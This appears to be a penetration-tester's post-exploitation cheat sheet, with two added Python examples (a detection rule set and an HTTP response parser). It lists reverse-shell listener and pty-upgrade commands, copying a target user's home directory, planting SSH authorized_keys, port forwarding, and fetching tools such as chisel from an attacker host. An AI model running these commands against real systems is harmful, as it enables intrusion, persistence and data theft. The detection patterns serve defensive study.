Upgrade Shell

# rlwrap wraps the listener in readline, so keyboard arrows and command
# history work locally even though the remote shell is not a tty:
rlwrap nc -lvnp <port>

# Another way to get a better shell.
# 'script' is present on almost every Linux machine.
# It allocates a pty, runs a shell inside it and logs the session (here to /dev/null):
SHELL=/bin/bash script -q /dev/null
# Or:
script -qc /bin/bash /dev/null

# Or use Python:
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Optional steps to get a more comfortable terminal (typed in the listener's terminal):
Ctrl-Z            # background the nc listener
stty raw -echo    # stop the local tty from echoing input and interpreting Ctrl-C
fg                # bring the listener back; the remote shell now receives raw keystrokes
reset             # if asked for the terminal type, answer: xterm
export TERM=xterm
# Also, if the shell came with a minimal PATH, set it (either form):
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"
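As an added example that is not part of the original notes, the snippet below shows the defender's side of the steps above: the pty-upgrade commands (`python -c ... pty.spawn(...)` and `script ... /dev/null`) leave recognisable command lines in process telemetry, and a small rule set over that telemetry flags them while ignoring a legitimate `script` session recording. The telemetry records, field names and rule names are constructed for this illustration.

```python
import re

# Constructed sample of process telemetry (shape similar to auditd execve
# records or an EDR process feed): one dict per observed process.
# Hypothetical data, not taken from the page.
SAMPLE_PROCS = [
    {"pid": 4101, "ppid": 4090, "comm": "python3",
     "cmdline": 'python3 -c import pty; pty.spawn("/bin/bash")'},
    {"pid": 4102, "ppid": 4090, "comm": "script",
     "cmdline": "script -qc /bin/bash /dev/null"},
    {"pid": 4103, "ppid": 4090, "comm": "script",
     "cmdline": "script -q /dev/null"},
    # Legitimate use: an admin recording a session to a real log file.
    {"pid": 4104, "ppid": 1, "comm": "script",
     "cmdline": "script -q session.log"},
    {"pid": 4105, "ppid": 4090, "comm": "python3",
     "cmdline": "python3 manage.py runserver"},
]

# Detection rules for the two on-target pty upgrades shown in the notes.
# Rule names are made up for this example.
RULES = [
    # python/python2/python3 -c '... pty.spawn(...)'
    ("pty_spawn_python", re.compile(r"\bpython[0-9.]*\b.*\bpty\.spawn\s*\(")),
    # script [-q] [-c <shell>] /dev/null : a pty with the transcript discarded
    ("script_devnull_pty", re.compile(r"(^|\s)script\b.*\s/dev/null(\s|$)")),
]


def match_pty_upgrade(procs):
    """Return [(pid, rule_name), ...] for every process whose command line
    matches one of the pty-upgrade rules. Each process is reported at most
    once, under the first rule that matches."""
    hits = []
    for proc in procs:
        for name, pattern in RULES:
            if pattern.search(proc["cmdline"]):
                hits.append((proc["pid"], name))
                break
    return hits


if __name__ == "__main__":
    for pid, rule in match_pty_upgrade(SAMPLE_PROCS):
        print(f"pid {pid}: {rule}")
```

The `/dev/null` requirement is what separates the upgrade trick from a normal `script` invocation: an operator recording a session keeps the transcript, while someone upgrading a shell throws it away. In production telemetry, correlating these hits with the parent process (a shell whose parent is a network client rather than a terminal emulator or sshd) raises confidence further.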

File Upload & Lateral Movement

SSH

# Skip the interactive host-key prompt (and the known_hosts mismatch error):
ssh -o StrictHostKeyChecking=no <user>@<RHOST>

# Get all the files FROM 'bob' home dir on the target, recursively
# (scp copies source -> destination, so the remote path comes first):
scp -i id_rsa -rp bob@<RHOST>:/home/bob/ /home/bob

# Send keys TO 'bob' (authorized_keys goes into the target's ~/.ssh):
scp -i id_rsa /home/bob/authorized_keys bob@<RHOST>:/home/bob/.ssh/

# SSH port forward. Inside an existing session, type the escape sequence ~C
# (Enter, then ~, then C) to get the ssh> prompt and add a forward on the fly:
ssh> -L 5901:127.0.0.1:5901
# Or at connection time (sudo because binding local port 80 needs root):
sudo ssh -L 80:192.168.xxx.xxx:80 <user>@<RHOST>

Web Server

Updog (https://github.com/sc0tfree/updog):

pip3 install updog
updog                                   # serve the current directory (default port 9090)
updog -d /another/directory             # serve a different directory
updog -p 1234                           # listen on another port
updog --password 'examplePassword123!'  # require a password (quoted: '!' triggers shell history expansion)
updog --ssl                             # serve over HTTPS with a self-signed certificate

Python web server:

# Python 3:
python3 -m http.server 80

# Python 2:
python2 -m SimpleHTTPServer 8080

File transfer

wget http://<LHOST>/<file>
curl http://<LHOST>/<file> -o <output-file>
# Raw HTTP over nc: the request must end with a blank line, and the sed deletes
# the response headers (7 lines for Python's http.server; adjust for other servers):
printf 'GET /<file> HTTP/1.0\r\n\r\n' | nc -n <LHOST> 80 > <out-file> && sed -i '1,7d' <out-file>

Using Python:

# Python 2 (urllib.urlretrieve); <LHOST> is a placeholder for the listener address:
python2 -c "from urllib import urlretrieve; urlretrieve('http://<LHOST>/chisel', '/opt/chisel')"
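The raw `nc` download above relies on `sed -i '1,7d'` to strip the HTTP headers, which only works when the server sends exactly seven header lines. As an added example that is not from the original notes, the following Python code splits a raw HTTP/1.x response at the header terminator instead, validates `Content-Length` so a truncated transfer is caught rather than silently producing a corrupt file, and reports how many lines that `sed` would have had to delete for the server at hand. The sample response bytes are constructed to mimic Python's `http.server`.

```python
# Constructed sample response, shaped like what `python3 -m http.server` returns.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 200 OK\r\n"
    b"Server: SimpleHTTP/0.6 Python/3.11.2\r\n"
    b"Date: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"Content-type: application/octet-stream\r\n"
    b"Content-Length: 11\r\n"
    b"Last-Modified: Mon, 01 Jan 2024 00:00:00 GMT\r\n"
    b"\r\n"
    b"hello world"
)
# Same response from a server that terminates lines with bare LF.
SAMPLE_RESPONSE_LF = SAMPLE_RESPONSE.replace(b"\r\n", b"\n")
# Connection cut before the body finished arriving.
SAMPLE_TRUNCATED = SAMPLE_RESPONSE[:-3]


def _split_head_body(raw: bytes):
    """Split at the first header terminator; CRLF is tried before bare LF."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        idx = raw.find(sep)
        if idx != -1:
            return raw[:idx], raw[idx + len(sep):]
    raise ValueError("no end of headers found")


def split_http_response(raw: bytes):
    """Return (status_line, headers, body) for a raw HTTP/1.x response.

    Header names are lower-cased. If Content-Length is present and does not
    match the body size, ValueError is raised instead of returning a partial
    or over-long file."""
    head, body = _split_head_body(raw)
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    status_line = lines[0].decode("ascii", "replace")
    headers = {}
    for line in lines[1:]:
        if b":" in line:
            name, value = line.split(b":", 1)
            headers[name.strip().decode("ascii", "replace").lower()] = \
                value.strip().decode("latin-1")
    declared = headers.get("content-length")
    if declared is not None and int(declared) != len(body):
        raise ValueError(
            f"body is {len(body)} bytes but Content-Length says {declared}")
    return status_line, headers, body


def sed_lines_to_strip(raw: bytes) -> int:
    """Number of leading lines (status line + headers + blank separator) that
    the cheat-sheet's `sed -i '1,Nd'` would need to delete for this server."""
    head, _ = _split_head_body(raw)
    return head.count(b"\n") + 2  # +1 for the status line, +1 for the blank line


if __name__ == "__main__":
    status, hdrs, body = split_http_response(SAMPLE_RESPONSE)
    print(status, hdrs.get("content-length"), body)
    print("sed would need to delete", sed_lines_to_strip(SAMPLE_RESPONSE), "lines")
```

Reading the full socket stream into `raw` and then calling `split_http_response` replaces both the fixed `1,7d` and the silent acceptance of a half-downloaded binary; the `Content-Length` check is the part worth keeping in any home-grown transfer tool.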

Secure file transfers (ncat --ssl encrypts the stream; without --ssl-cert on the listener and --ssl-verify on the client it is not authenticated):

# On target (receiver):
ncat -nvlp <port> --ssl > <out-file>

# On Kali (sender):
ncat -nv <RHOST> <RPORT> --ssl < <file-to-send>

Enumeration Tools

Manual Checks